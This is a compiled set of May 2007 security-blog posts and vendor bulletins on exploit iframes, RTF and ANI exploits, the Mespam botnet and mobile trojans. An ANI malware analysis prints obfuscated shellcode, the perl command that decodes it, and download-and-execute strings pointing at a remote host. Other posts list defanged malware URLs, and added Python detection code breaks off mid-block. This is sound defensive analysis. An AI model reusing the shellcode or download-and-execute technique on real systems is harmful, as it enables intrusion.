May 2007 - Posts


Published: 2007-05-30,
Last Updated: 2007-05-30 10:04:41 UTC
by Daniel Wesemann (Version: 1)
In a previous diary, we wrote about the surprising prevalence of those exploit "iframes" which in the end download a file called "funny.php" off a server in Russia, Panama, Ukraine, etc. "funny.php" is an EXE sailing in disguise, and usually a
password-stealing spyware of the "Bancos" family. The file changes frequently and cleverly enough to keep the majority of anti-virus products perpetually in the dark. The only two things that tend to "save the day" if a user happens across one
of these IFRAMEs are that, firstly, the vulnerabilities exploited are pretty old (and patched), and secondly, the anti-virus detection for the exploit iframe (the infection "vector") is significantly better than detection for the spyware (the "payload").

Some anti-virus products apparently trigger on the "obfuscation" of the exploit (it is encoded JavaScript), risking a higher false positive rate by doing so, but also making it less likely that a tiny change in the exploit code renders the signature useless. Others apparently trigger on the exploit itself. The obfuscation and exploits used have been pretty much the same for the past three months, so one would reasonably expect anti-virus coverage to be well in place.

When today a user of mine "found" another one of these funny.phps, I decided to pass both the vector and payload files through Virustotal to see who was up to snuff:

Virustotal results for the obfuscated exploit file ("forum.php")

Virustotal results for the payload ("funny.php")

The results speak for themselves, with quite a few prominent vendors competing for the coveted "Sees No Virus" award :). I'm constantly amazed at how anti-virus ever could grow into a multi-billion dollar industry.

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

********************************************************************

Title: Microsoft Security Bulletin Minor Revision

Issued: May 31, 2007

********************************************************************

Summary
=======
The following bulletin has undergone a minor revision increment.
Please see the appropriate bulletin for more details.

* MS07-029

Bulletin Information:
=====================

* MS07-029

- http://www.microsoft.com/technet/security/bulletin/ms07-029.mspx
- Reason for Revision: Bulletin revised. File Information updated for Windows Server 2003. Clarification added throughout the bulletin for server configurations that may require the installation of DNS functionality as a prerequisite for the security update installation.
- Originally posted: May 8, 2007
- Updated: May 31, 2007
- Bulletin Severity Rating: Critical
- Version: 1.1

********************************************************************


Published: 2007-05-29,
Last Updated: 2007-05-29 23:29:45 UTC
by Joel Esler (Version: 2)
/** Hope you Windows guys have better luck with this update than other Apple Updates in the past **/

UPDATE: A lot of people have written in telling us that 7.1.6 is the current version and there are no other updates. Yes, 7.1.6 IS CURRENT. This is a security update FOR 7.1.6, as indicated in the subject. Please see http://www.apple.com/support/downloads/ and you will see that there ARE Security Updates.

http://docs.info.apple.com/article.html?artnum=305531

Security Update (QuickTime 7.1.6)

QuickTime

CVE-ID: CVE-2007-2388

Available for: QuickTime 7.1.6 for Mac OS X and Windows

Impact: Visiting a malicious website may lead to arbitrary code execution

Description: An implementation issue exists in QuickTime for Java, which may allow instantiation or manipulation of objects outside the bounds of the allocated heap. By enticing a user to visit a web page containing a maliciously crafted Java applet, an attacker can trigger the issue which may lead to arbitrary code execution. This update addresses the issue by performing additional validation of Java applets. Credit to John McDonald, Paul Griswold, and Tom Cross of IBM Internet Security Systems X-Force, and Dyon Balding of Secunia Research for reporting this issue.

QuickTime

CVE-ID: CVE-2007-2389

Available for: QuickTime 7.1.6 for Mac OS X and Windows

Impact: Visiting a malicious website may lead to the disclosure of sensitive information

Description: A design issue exists in QuickTime for Java, which may allow a web browser's memory to be read by a Java applet. By enticing a user to visit a web page containing a maliciously crafted Java applet, an attacker can trigger the issue which may lead to the disclosure of sensitive information. This update addresses the issue by clearing memory before allowing it to be used by untrusted Java applets.

(Information came from Apple's website)

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc


Published: 2007-05-25,
Last Updated: 2007-05-25 22:54:35 UTC
by Bojan Zdrnja (Version: 1)
We are receiving more reports about targeted attacks claiming to be from the Better Business Bureau. The spam always comes with an RTF attachment. Does this ring a bell? If you’re a frequent reader of ISC you might remember that I already posted an analysis of such an attack back in March – you can find it here: http://isc.sans.org/diary.html. BBB also posted an alert about this quite a while ago (http://www.bbb.org/alerts/article.asp).

Basically the attackers use an application called Object Packager to embed an executable in an RTF document. The executable is typically a downloader which, when executed, downloads second-stage malware. The attackers keep changing both the downloader and the second-stage malware, together with the sites they are using. It is worth pointing out again that this attack does not exploit any Office vulnerability; instead it relies on social engineering (see the screenshots in the old diary).

While the attack itself is not very interesting, what is interesting is that the spam e-mails carrying this seem to be targeted. In fact, almost all reports we’ve received lately (and Sunbelt blogged about the same thing at http://sunbeltblog.blogspot.com/2007/05/seen-in-wild-extremely-dangerous-better.html) claimed that only a couple of users in the attacked organizations received this and that they were almost always CEOs or CFOs.

So what can we do here? As you can see from my old diary, AV detection of embedded objects in RTF documents seems to be very weak. The detection of the downloader I extracted at that point in time was a bit better but this was still far away from perfect, especially when we’re talking about the last line of defense – the AV program on the desktop machine.

If possible, you can block RTF files on your e-mail gateways, but this might have a counterproductive effect as we’ve been encouraging users for years to use “more friendly” text formats such as RTF (and who thought that objects can be embedded this easily in them).

As always, the best defense here is user education. Besides general awareness, it might be good to warn your users (especially the C*O levels) about this particular attack as it does rely purely on social engineering (the user has to confirm that he wants the executable opened).

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc


Cross-Platform OpenOffice Virus Proof of Concept

Published: 2007-05-24,
Last Updated: 2007-05-24 20:08:18 UTC
by John Bambenek (Version: 1)

A virus writer sent a proof-of-concept virus called BadBunny to Sophos that uses vulnerabilities in OpenOffice to infect Windows, Linux and Mac OS X. Depending on the host operating system, the virus will perform different actions to infect the target machine. In this case, it downloads a lewd image of a scantily clad woman and a dude in a big ol' bunny suit. It's not the first or last attempt at such cross-platform virus writing (or the inclusion of bizarre graphics in malware) but the limitation of seeing much of this cross-platform work lies in the fact that few applications are widely deployed and run on multiple operating systems. Few people use OpenOffice (in comparison to MS Office) to make it worth the while of a would-be attacker looking for anything other than bragging rights. However, viruses are possible for a variety of operating systems (yes, including Mac OS X) and the day may come when those users will have to be just as vigilant as those on Windows.
--
John Bambenek / bambenek {at} gmail [dot] com
University of Illinois at Urbana-Champaign

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

Check this one out, it's the one we have been waiting for!


********************************************************************

Title: Microsoft Security Advisory Notification

Issued: May 22, 2007

********************************************************************

Security Advisories Updated or Released Today
==============================================

* Microsoft Security Advisory (927891)

- Title: Fix for Windows Installer (MSI)

- http://www.microsoft.com/technet/security/advisory/927891.mspx

- Revision Note: Advisory published: May 22, 2007

********************************************************************

Ok this is NOT good.  Good catch Donna!! 

Symantec AntiVirus cannot detect viruses after you install a hotfix

Symantec AntiVirus cannot detect viruses after you install a hotfix on a computer that is running Windows Server 2003 or Windows XP SP2

You install a hotfix on Microsoft Windows Server 2003 or on Microsoft Windows XP Service Pack 2 (SP2). However, after you install the hotfix, Symantec AntiVirus cannot correctly detect viruses in encrypted files that reside on a network share or in a document library.

This problem occurs if you have installed the hotfix that is described in the following Microsoft Knowledge Base article:
922582 (http://support.microsoft.com/kb/922582/) Error message when you try to update a Microsoft Windows-based computer: "0x80070002"

This problem occurs if the following conditions are true:
• A legacy filesystem filter driver is installed on the same computer as Symantec AntiVirus.
• The legacy filesystem filter driver is configured to encrypt files that are stored on network shares.

http://support.microsoft.com/default.aspx?scid=kb;en-us;933215
http://support.microsoft.com/kb/922582/

Published Monday, May 21, 2007 6:18 PM by donna

Source: Symantec AntiVirus cannot detect viruses after you install a hotfix - Donna's SecurityFlash


Published: 2007-05-22,
Last Updated: 2007-05-22 07:17:54 UTC
by Bojan Zdrnja (Version: 2)
Some time ago one of our readers, Andrew, submitted an interesting ANI exploit sample. Unless you’ve been under a rock for the last couple of months, you heard about the latest ANI vulnerability.

Most of the exploits we’ve seen so far (and we’ve seen thousands of them) didn’t try to obfuscate the exploit code. The exploit code itself almost always contained a downloader that downloaded the second stage binary from a remote site and executed it on the victim’s machine.

As the exploit wasn’t obfuscated, running the simple strings command was enough to see the URL of the second stage binary. So, in order to find the second stage binary, Andrew ran the strings command on the new ANI exploit; however, this time no URL was present:

$ strings 123.htm
RIFF
ACONanih$

jvvr<1142;03820940:21921PQVGRCF0GZG
IgvRtqeCfftguu


Those experienced analysts amongst you will immediately notice the string starting with jvvr< and will comment that this must be an XOR-ed URL (http://something). In other words, it appears that this exploit is obfuscating the target URL. Andrew came to the same conclusion and tried to crack the XOR code.

If you try to XOR jvvr to get http, you will see that the correct XOR value is 0x02. The easiest way to do this is to use a nice little utility by Didier Stevens called XORSearch (http://didierstevens.wordpress.com/programs/xorsearch/). This utility brute-forces a file in order to find the XOR key for any given string in the file. So I downloaded the utility and ran it on the ANI exploit sample and indeed, the correct XOR value for the http string is 0x02, but the rest of the URL was still not there:

D:\>XORSearch.exe 123.htm http
Found XOR 02 position 01FB: http>3360921:02;62803;03RSTEPAD2EXE


We can see something at the end as well that looks like notepad.exe. This means that the URL is either XOR-ed with multiple keys or some other obfuscation is used. At this point you have a couple of options: you can play with brute forcing, you can infect a goat machine and just see what happens (it’s easy enough to capture network traffic of a goat machine and see what the target URL is) or you can try to analyze the exploit code itself – and that’s what we’ll do.

The trick with the latest ANI exploit was that the two bytes after the “anih” section define how many bytes are to be copied. As the vulnerable function reserved only 36 bytes on the stack it was easy to cause a buffer overflow (I won’t go into details now but the first section copy function was patched previously). So, let’s see what we have in this file:

$ xxd 123.htm
0000000: 5249 4646 0004 0000 4143 4f4e 616e 6968 RIFF....ACONanih
0000010: 2400 0000 2400 0000 ffff 0000 0a00 0000 $...$...........
0000020: 0000 0000 0000 0000 0000 0000 0000 0000 ................
0000030: 1000 0000 0100 0000 5453 494c 0300 0000 ........TSIL....
0000040: 1000 0000 5453 494c 0300 0000 0202 0202 ....TSIL........
0000050: 616e 6968 a803 0000 0b0b 0b0b 0b0b 0b0b anih............
0000060: 0b0b 0b0b 0b0b 0b0b 0b0b 0b0b 0b0b 0b0b ................


We sure have two anih sections. The buffer size of the second section (the a803 0000 following the second anih at offset 0x50 in the dump above) is 0x03a8, which is actually 936 bytes – right to the end of the file. We can also see that this section starts with a lot of 0x0b bytes. After a bunch of 0x0b bytes we can see something that looks like real code:

00000a0: 0b0b 0b0b 0b0b 0b0b 17a2 4000 0b0b 0b0b ..........@.....
00000b0: 0b0b 0b0b 0b0b 0b0b 0b0b 0b0b 0b0b 0b0b ................
00000c0: 31c9 6681 c138 02eb 035e eb05 e8f8 ffff 1.f..8...^......
00000d0: ff83 c609 802e 0246 e2fa ea02 0202 025f .......F......._
00000e0: 83ef 2f14 4202 ea8a 0302 028f 872b 1542 ../.B........+.B
00000f0: 02ea 0202 0277 746e 6f71 7030 666e 6e02 .....wtnoqp0fnn.


So what we’ll do now is take this code and disassemble it. It looks like the real code starts at 0x00000c0, so let’s get rid of everything before that:

$ dd if=123.htm of=code ibs=1 skip=192

Now there are various ways to disassemble this. If you are lucky and have a license for IDA Pro you can just load this file into it (actually, you can even load the 123.htm file and then manually tell IDA Pro to start disassembling the code around 0x00000c0). As I really like OllyDbg, I tend to do everything with it, but in order to load this code into OllyDbg we have to create a PE file. The process now is the same as when you analyze shellcode, so the easiest way is to use iDefense’s Malcode Analysis Pack and its Shellcode2Exe utility (http://labs.idefense.com/software/malcode.php#more_malcode+analysis+pack).

Once you’ve done this you will have an executable file with proper sections and headers that actually executes your code. This is how it looks in OllyDbg:

[Screenshot: the decoder loop as shown in OllyDbg (ollyani.PNG)]

So what do we have here? The real code starts at 0x00401020. It first zeroes the ECX register (the XOR command) and adds 0x238 to it. Then it does a couple of jumps and a CALL in order to get the address of the ADD ESI,9 instruction into the ESI register. This is a standard method to get the code address into a register (a CALL instruction followed by a POP instruction). The code skips 9 bytes and then loops over the next 0x238 bytes. In the loop, each byte is decreased by 0x02! Aha, so this is how they obfuscated it – the code modifies itself completely (both the URL and the actual code).

You can now execute this in OllyDbg and see what happens (you will have to set a breakpoint after the loop and then tell OllyDbg to re-analyze this section). Or, if you are just interested in the final URL, we can use perl to subtract 0x02 from every byte in this file:

$ perl -pe 's/(.)/chr(ord($1)-0x02)/ge' < code > final

$ strings final
urlmon.dll
URLDownloadToFileA
c:\boot.inx
c:\boot.inx
LoadLibraryA
WinExec
ExitProcess
http://[REMOVED].72.80/70/NOTEPAD.EXE
GetProcAddress


And here we are! You can see that the code loads urlmon.dll, uses the URLDownloadToFileA() function to download the URL at the bottom and saves it as c:\boot.inx.
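The two checks from this walkthrough, automated as an added example that is not the diary's code: scan the file for "anih" chunks whose declared size is not the 36 bytes the vulnerable parser expects, then undo the decoder loop's "subtract 0x02 from every byte" transform on that chunk's payload so the imported API names and download URL become readable. The sample bytes are constructed to mimic the diary's dump; the URL in it is a placeholder.

```python
"""Triage helper for self-modifying ANI samples like the one in the diary.

Added example (not the diary author's code).  Constructed sample data below;
the URL is a placeholder, not the one from the real file.
"""
import re
import struct

ANIH_HEADER_SIZE = 36  # sizeof(ANIHEADER); the first anih chunk in the dump declares 0x24
STRING_RE = re.compile(rb"[\x20-\x7e]{4,}")  # same idea as the `strings` command


def find_anih_chunks(data: bytes):
    """Return (offset, declared_size) for every "anih" chunk header in the file.

    A linear scan is used on purpose: the exploit places its oversized anih
    after the real one, so no structured RIFF/LIST walk is needed for triage.
    """
    out = []
    pos = data.find(b"anih")
    while pos != -1:
        if pos + 8 <= len(data):
            (size,) = struct.unpack_from("<I", data, pos + 4)  # 4-byte LE chunk size
            out.append((pos, size))
        pos = data.find(b"anih", pos + 4)
    return out


def oversized_anih(data: bytes):
    """Chunks whose declared size is not 36 bytes: the overflow trigger described above."""
    return [(off, size) for off, size in find_anih_chunks(data) if size != ANIH_HEADER_SIZE]


def decode(buf: bytes, delta: int = 0x02) -> bytes:
    """Reverse the decoder loop: each byte was stored as (original + delta) & 0xff.

    Wrapping modulo 256 keeps bytes 0x00 and 0x01 valid; the diary's perl
    one-liner does not wrap, which is fine for the ASCII strings but not for
    a byte-exact decode of the code itself.
    """
    return bytes((b - delta) & 0xFF for b in buf)


def recover_strings(data: bytes, delta: int = 0x02):
    """Decode the payload of every oversized anih chunk and pull out printable strings."""
    found = []
    for off, size in oversized_anih(data):
        # The declared size may run past the end of the file; slicing just truncates.
        payload = data[off + 8 : off + 8 + size]
        found.extend(m.group().decode("ascii") for m in STRING_RE.finditer(decode(payload, delta)))
    return found


def encode(buf: bytes, delta: int = 0x02) -> bytes:
    """Inverse of decode(); used only to build the constructed sample below."""
    return bytes((b + delta) & 0xFF for b in buf)


# Constructed sample mimicking the diary's layout: a correct 36-byte anih, then a
# second anih claiming 0x3a8 bytes, a run of 0x0b filler bytes, and the encoded blob.
_ENCODED_BLOB = encode(
    b"urlmon.dll\x00URLDownloadToFileA\x00c:\\boot.inx\x00"
    b"http://example.invalid/70/NOTEPAD.EXE\x00GetProcAddress\x00"
)
SAMPLE = (
    b"RIFF" + struct.pack("<I", 0x400) + b"ACON"
    + b"anih" + struct.pack("<I", ANIH_HEADER_SIZE) + bytes(ANIH_HEADER_SIZE)
    + b"anih" + struct.pack("<I", 0x3A8) + b"\x0b" * 16 + _ENCODED_BLOB
)

if __name__ == "__main__":
    for off, size in oversized_anih(SAMPLE):
        print(f"suspicious anih at offset {off:#x}: declared size {size:#x} ({size} bytes)")
    for s in recover_strings(SAMPLE):
        print(s)
```

Run against a real .ani, `oversized_anih` is the detection step and `recover_strings` the triage step; for a sample with a different delta, pass it explicitly.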

Luckily, the AV vendors were on the ball this time – almost all AV vendors detected the ANI file properly (I do wonder if they had specific signatures for this or used a generic/heuristic one).

UPDATE

Just as I wrote that almost all AV vendors detected this sample properly, it looks like some are raising false positives as well.

We received several e-mails from our readers stating that Norton Internet Security (Symantec) detects this diary as an intrusion (“HTTP ANI File Anih Hdr Size BO”) and as a result blocks access to the diary, no matter what browser you’re using.
This is clearly a false positive as there are no ANI files in the diary (just one PNG screenshot of OllyDbg):

$ file ollyani.PNG
ollyani.PNG: PNG image data, 689 x 513, 8-bit/color RGB, non-interlaced

My guess is that they must be triggering on the hexdump or the ASCII part of it. If you are running an affected version of Symantec and have some time to play with it, it would be interesting to see what exactly triggers this – let us know if you figure this out.

Bojan

Source: SANS Internet Storm Center; Cooperative Network Security Community - Internet Security - isc

********************************************************************

Title: Microsoft Security Advisory Notification

Issued: May 21, 2007

********************************************************************

Security Advisories Updated or Released Today
==============================================

* Microsoft Security Advisory (937696)

- Title: Release of Microsoft Office Isolated Conversion Environment (MOICE) and File Block Functionality for Microsoft Office

- http://www.microsoft.com/technet/security/advisory/937696.mspx

- Revision Note: Advisory Published: May 21, 2007

********************************************************************


And you can take that to the .bank
Posted by Mikko @ 07:59 GMT


We've been pushing for an initiative to get a secure top-level domain (like ".bank" or ".safe") for some time now. See this post for original context.

We've received lots of questions and also plain criticism over the whole idea – most notably, in Slashdot as well as from Larry Seltzer in his prominent blog.

So let me collect the most typical challenges to the idea, and answer them.

A new top-level domain will not solve the phishing problem once and for all, so it's not even worth considering.

This is not a silver bullet. A new top-level-domain (TLD) would not be the end of the phishing problem. But it would be a helpful top-level domain and it would stop a particular subset of phishing completely.

But .com works just fine!

Today anybody can get a .com domain with a fake name and fake address, with a fake credit card. That's just fine with everybody? Don't we really need a TLD where you could actually trust that you know who owns the domain?

Phishers could still create realistic-looking fake domains. For example a look-a-like for www.citi.bank could be www.citi.bank.account.yadayada.com.

Yes, phishers would still be able to do this; this new top-level-domain would not be able to do anything to stop this problem. Same thing with masked html links.

Illustration by Nenad Jakesevic for Foreign Policy

People are stupid and would not notice such a new address scheme.

The main point of such a new TLD would not be that users would suddenly get a clue and would learn to read the web addresses correctly (although for those who do read the URLs, this would obviously be an improvement). The main point is that it would allow the users' software to work better. Security software and browser toolbars would essentially have a "white list" to work with.

What about security researchers?

This would make life easier for security researchers to figure out which sites are not phishing sites. This really isn't as obvious as it sounds, as banks themselves use tons of different domains. We often spend precious time trying to confirm whether a particular phishy-sounding domain really belongs to a real bank or not.

Small banks and/or credit unions couldn't afford it.

Small banks are not currently the ones losing the most money. It's the big banks. And the domain doesn't have to be ".bank" literally. The TLD could be along the lines of .account, .verified, .safe, et cetera. It would be a TLD for "big players" that deal with lots of money. PayPal or eBay come to mind. And yeah, PayPal isn't a traditional bank but they certainly do get phished. They might want to have a secured TLD for account access.

Organized online criminals could afford to buy .bank domains for $50,000.

Only if they can prove that they are a real bank. And they would not be able to register misleading domain names. And in the worst case, a rogue domain would be shut down quickly. The possibility of losing their investment in registering such a domain wouldn't be worth the risk for criminals.

What about .pro?

The .pro TLD does validate who gets the domains, but it's targeting a different audience (individual professionals like doctors and lawyers).

Extended Validation (EV) certificates largely address the same issues.

We're not against these new high-security web certificates. However, a secure top-level domain would still be a good idea: it would authenticate the domain as trusted by the name alone. There's no way to know if a site has a high-security certificate without visiting it.

Banks don't deserve their own domain.

We already have a TLD for airlines (try www.nw.aero) and museums (try the.british.museum). Isn't it a bit odd that we don't have one for banks, although they are the ones that get attacked all the time?

Would this be a global domain?

Probably. Then again, nothing prevents local governments from setting up domains like .bank.uk, .bank.jp, .bank.au in their own jurisdictions.

Would it work?

Yes: in the end there probably would be no rogue sites under such a new TLD. They would be elsewhere.

There are no rogue sites on .gov domain names. Why? Because you can only get a .gov domain if you really are a US governmental organization. Or how about .fi? The .fi (Finland) domain has very few malicious websites. Why is that? Because the registration process involves mailing a verification code to a physical mailing address. Just that extra step makes it less convenient to use for the bad guys. With all the extra verification steps that we would have in the registration of a .bank domain, scammers just wouldn't be able to do it.

Ok, I'm convinced. What's next?

This initiative won't move further until we find a sponsoring organization that starts to push it and proposes it officially to ICANN. This sponsoring organization is what we are trying to find at the moment.

This piece was crossposted with Foreign Policy blog.

Source: F-Secure : News from the Lab


Mespam meets Zunker (and targets German users)

“Whenever I post my computer puts something on the end of my post that I didn't type. Just look, it's that link and the text know will appear when I post this. P.S.Look,Super sreensaver! :)) …”

I wanted to start this blog by quoting a post picked up from one of the many forums contaminated by Mespam to show exactly what infected users experience without having a clue of what’s going on with their computer. If your friends are complaining that your e-mails, blog posts and chat sessions show a suspicious URL linking to photos, jokes or screensavers that you hadn’t sent them, you’re probably another victim of this Trojan.

Trojan.Mespam was originally spotted in February and we described here the new spreading technique, which uses an LSP component to attach text and malicious links to the outgoing HTTP traffic. In the Web 2.0 world this technique has proven its efficiency. It’s worth mentioning that Mespam was distributed via the Trojan.Peacomm P2P network.

In the last few months we’ve seen many recompiled variants of this Mespam coming out, and I’m reporting here some of the malicious URLs that users should absolutely never click, even if they seem to be posted by trusted friends. We have noticed that each outbreak of Mespam has a main “theme” in the spammed messages, such as postcards, jokes, screensavers, and photos, which is configured by a remote C&C center. When we examine the languages of contaminated forums and blogs, it looks like some infections are localized only to specific countries.

February – The “Jokes” malicious URLs series:
 hxxp://jokeonlineworld.com
 hxxp://practicaljokeonline.com
 hxxp://dailyjokeonline.com

March – The “Screensavers” malicious URLs series:
 hxxp://screensavers4us.info/funscr/silly_bear32_funny.scr
 hxxp://webcounterstat.info/screensavers/wallpapers_gold_bear_b.scr

April – The "Sex-game" malicious URLs series:
 hxxp://www.vixen-toys.com/download/sex-game-3.801.zip
 hxxp://www.marketing-know-how.com/just/sex-game-3.801.zip
 hxxp://fruitsinsuits.com.hk/images/flyers/sex-game-3.801.zip

May – The "foto" malicious URLs series (only targeting Germans?):
 hxxp://www.lastik.com/images/foto.exe
 hxxp://www.ultimatexpressions.co.uk/foto.exe
 hxxp://www.arborwood.com/images/foto.exe

With some help from Google I’ve searched forums, blogs and web boards for the keywords included in the spam messages, to estimate how many forums and sites contain infected posts. The results shown in this table were not optimistic. We should mention that Mespam also spreads through IM, traditional e-mail and web mail, so we’re not considering in this statistic all the messages spammed, for example via Gmail, Yahoo Mail, ICQ, AIM, etc.

(*) – the keyword includes all the links spammed for the “screensaver” series

But who controls what the infected bots spam, and where? This diagram shows some Mespam code on the right and a C&C interface on the left.

The interface on the left is also known as “Zunker” and is a C&C web panel that controls Mespam bots. The connections between Mespam code and the Zunker panel are obvious. We have many other clues that they are just different pieces of the same thing. With this panel, the botmaster has quick statistics on the number of infected hosts, affected countries, new bots added recently, and can also see which channels, such as IM, traditional mail, webmail, and forums, are used to send spam.

The configuration area of the panel gives the botmaster the ability to choose a different template message for each channel. This is an example of a configured template found on one of the many Zunker interfaces analyzed recently.

When the botnet becomes big enough, the botmaster can use it to infect more hosts or eventually install a secondary Trojan on the infected machines. This secondary file is always configured from the Zunker interface, and is usually a bank Trojan or DDoS threat. In some cases, after the botnet is ready, the botmaster tries to sell this “install-a-Trojan” service to other cyber-criminals who can decide which Trojan to distribute on the infected hosts.

For example, we’ve seen a file named “ebr9.exe” on a Zunker botnet, which from the panel statistics was targeting mostly German users. This Trojan drops the BHO file “%SYSTEM%\console32.dll” and tries to hijack the execution of the following German programs by changing the registry key “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Option” for each of them:

Banking.exe
BankingUpdate.exe
Erinnerung.exe
GetOn4uHdWID.exe
MG.exe
MGBSE.exe
Mnyupdate.exe
Msmoney.exe
Netviewer.exe
Nv_o2o_Teilnehmer_DE.exe
Salv.exe
Sanitize.exe
SCRSetup.exe
Smkonv.exe
StartStarMoney.exe

The reason for this registry key change is unclear, but German users who have these specific programs should double-check their machines for this Trojan.

We don’t know if the Zunker interface was created together with Trojan.Mespam, or if it was added later by someone else. The current statistics of Mespam samples show that there’s a specific Zunker web panel link hardcoded in every different version of Trojan.Mespam DLL. So probably the package Mespam/Zunker is sold together on the underground market.

Posted by Elia Florio on May 18, 2007 03:13 PM

Source: Symantec Security Response Weblog: Mespam meets Zunker (and targets German users)

********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: May 17, 2007
********************************************************************

Summary
=======
The following bulletins have undergone a minor revision increment. Please see the appropriate bulletin for more details.

* MS07-025
* MS07-023

Bulletin Information:
=====================

* MS07-025

- http://www.microsoft.com/technet/security/bulletin/ms07-025.mspx
- Reason for Revision: This Bulletin has been revised due to new issues discovered with the security update as reflected in Microsoft Knowledge Base Article 934873
- Originally posted: May 8, 2007
- Updated: May 17, 2007
- Bulletin Severity Rating: Critical
- Version: 1.2
* MS07-023

- http://www.microsoft.com/technet/security/bulletin/ms07-023.mspx
- Reason for Revision: This Bulletin has been revised due to new issues discovered with the security update as reflected in Microsoft Knowledge Base Article 934233
- Originally posted: May 8, 2007
- Updated: May 17, 2007
- Bulletin Severity Rating: Critical
- Version: 1.2
********************************************************************

********************************************************************
Title: Microsoft Security Bulletin Minor Revisions
Issued: May 16, 2007
********************************************************************

Summary
=======
The following bulletins have undergone a minor revision increment.
Please see the appropriate bulletin for more details.

* MS07-027
* MS07-025
* MS07-023

Bulletin Information:
=====================

* MS07-027

- http://www.microsoft.com/technet/security/bulletin/ms07-027.mspx
- Reason for Revision: Bulletin revised due to an incorrect file name in Arbitrary File Rewrite Vulnerability - CVE-2007-2221 killbit table; A new issue discovered with the security update: 937409 The "File Download - Security Warning" dialog box opens when you try to open Internet Explorer 7; Updated file names for Internet Explorer 7
- Originally posted: May 8, 2007
- Updated: May 16, 2007
- Bulletin Severity Rating: Critical
- Version: 1.2
* MS07-025

- http://www.microsoft.com/technet/security/bulletin/ms07-025.mspx
- Reason for Revision: Bulletin workarounds section updated, with the removal of the "Use Microsoft Word Viewer 2003 to open and view files" workaround. This workaround is not valid for the vulnerability discussed in this security bulletin.
- Originally posted: May 8, 2007
- Updated: May 16, 2007
- Bulletin Severity Rating: Critical
- Version: 1.1
* MS07-023

- http://www.microsoft.com/technet/security/bulletin/ms07-023.mspx
- Reason for Revision: Bulletin "Installation File Information" section updated with the correct file name for the Office 2007 Compatibility Pack.
- Originally posted: May 8, 2007
- Updated: May 16, 2007
- Bulletin Severity Rating: Critical
- Version: 1.1
********************************************************************


New For-Profit Symbian Trojans
Posted by Jarno @ 12:46 GMT


Viver.B

Yesterday we received a couple of interesting cases from our partner: three new for-profit SMS trojans that affect Symbian S60 2nd Edition and older devices.

The Viver family of trojans claim to be utility programs for Symbian phones. They have been uploaded to at least one popular file sharing site in the hopes that people will download and install them.

After installation, the Viver trojans immediately start sending SMS messages to premium-rate numbers. The messages are sent with proper international area codes, so they are able to reach the correct destination even when activated outside Russia.

We've already seen for-profit malware in mobile devices: Wesber.A and Redbrowser are Java Midlet trojans that try to send messages to Russian premium-rate numbers. But these trojans require user acceptance for each message and are able to send messages correctly only inside Russia.

But as the Viver family is more advanced and is able to operate anywhere, we find this development worrisome. Prior to 2003 there was little for-profit malware on the PC platform, and now almost all malware is written for one or other profit motivation. It is very likely that more for-profit malware will also appear on mobile platforms.

All three Viver variants are detected with F-Secure Mobile Anti-Virus.

For more information on Viver see Viruslist.com's: Analyst's Diary.

Source: F-Secure : News from the Lab

 

Downloader-BBS: The Italian Job

Thursday May 17, 2007 at 4:35 am CST
Posted by Vinoo Thomas


McAfee Avert Labs encountered a spam run yesterday specifically targeting individuals in Italy by using a social engineering technique. The spammed email, worded in Italian, appears to be from the Italian Police, warning users that there is evidence that pirated mp3 files have been downloaded onto their computer. The email has been craftily worded and looks convincing enough to dupe recipients into believing the mail is genuine. A copy of the spammed email is as follows:

Spammed Email

Except that makes you wonder: since when did the RIAA team up with the Italian police? ;-)

Such targeted attacks on specific countries or communities are becoming more and more frequent. German internet users must be sick of weekly spam runs of the Downloader-AAP trojan with similar social engineering themes. A typical spam run lasts for a few hours and is usually seeded from a botnet of infected computers. Malware authors typically create a single-use disposable trojan and test it against detection by popular antivirus vendors, tweaking it until it becomes undetected. This gives the trojan a better shelf life in the wild, as it evades proactive detection by antivirus software. The next time a spam run is executed, a new variant is used, and this vicious cycle continues. We have also observed that the same binary is never used again in another spam run.

The mass spammed Downloader-BBS sample in this case arrives in a password protected archive with the password specified in the message body. Once executed it downloads a dialer program designed to connect to a premium-rate number from a remote web server based in Russia.
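A mail-triage check for the delivery pattern just described, added here as an example (it is not McAfee code): it flags a message only when an attached ZIP has its encryption bit set AND the body supplies a password. The sender address, file names, body wording and the password keywords it matches are constructed assumptions.

```python
"""Triage check for the delivery pattern described above: an encrypted archive
attachment whose password is supplied in the message body.  Added example, not
McAfee code; the message, file names and password keywords are constructed."""
import io
import re
import struct
import zipfile
import zlib
from email import message_from_bytes, policy
from email.message import EmailMessage

# Keywords are an assumption; a real filter would carry a broader multilingual list.
PASSWORD_HINT = re.compile(r"(?:password|parola)\s*[:=]\s*(\S+)", re.IGNORECASE)


def make_encrypted_zip(name: bytes, payload: bytes) -> bytes:
    """Constructed sample: a minimal ZIP whose general-purpose flag bit 0
    (entry is encrypted) is set.  The payload stands in for ciphertext; no cipher
    is applied, which is all the header check below needs."""
    crc, n, flags = zlib.crc32(payload) & 0xFFFFFFFF, len(payload), 0x0001
    local = struct.pack("<IHHHHHIIIHH", 0x04034B50, 20, flags, 0, 0, 0x21,
                        crc, n, n, len(name), 0) + name + payload
    central = struct.pack("<IHHHHHHIIIHHHHHII", 0x02014B50, 20, 20, flags, 0, 0,
                          0x21, crc, n, n, len(name), 0, 0, 0, 0, 0, 0) + name
    eocd = struct.pack("<IHHHHIIH", 0x06054B50, 0, 0, 1, 1, len(central), len(local), 0)
    return local + central + eocd


def encrypted_members(data: bytes) -> list:
    """Return the names of encrypted entries in a ZIP blob ([] if not a ZIP)."""
    if not data.startswith(b"PK\x03\x04"):
        return []
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return [zi.filename for zi in zf.infolist() if zi.flag_bits & 0x1]
    except zipfile.BadZipFile:
        return []


def triage_message(raw: bytes) -> dict:
    """Flag a message that carries an encrypted archive AND a password in its body.
    Either signal alone is common in legitimate mail; the combination is the pattern."""
    msg = message_from_bytes(raw, policy=policy.default)
    body = msg.get_body(preferencelist=("plain",))
    hint = PASSWORD_HINT.search(body.get_content() if body else "")
    members = []
    for part in msg.iter_attachments():
        names = encrypted_members(part.get_payload(decode=True) or b"")
        if names:
            members.append((part.get_filename(), names))
    return {
        "password_in_body": hint.group(1) if hint else None,
        "encrypted_archives": members,
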